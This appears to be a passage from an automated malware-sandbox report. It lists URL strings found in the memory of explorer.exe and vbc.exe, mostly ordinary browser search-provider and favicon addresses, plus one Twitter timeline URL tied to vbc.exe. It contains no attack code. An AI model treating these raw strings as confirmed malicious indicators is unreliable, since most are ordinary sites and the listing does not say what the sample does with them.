      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
      Source: explorer.exe, 00000007.00000000.2193140646.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: explorer.exe, 00000007.00000000.2193140646.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
      Source: explorer.exe, 00000007.00000000.2187709209.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
      Source: explorer.exe, 00000007.00000000.2195506966.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
      Source: vbc.exe, vbc.exe, 00000006.00000000.2183745141.0000000000272000.00000020.00020000.sdmpString found in binary or memory: http://twitter.com/statuses/user_timeline.xml?screen_name=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
      Source: explorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: explorer.exe, 00000007.00000000.2193140646.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000007.00000000.2187709209.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
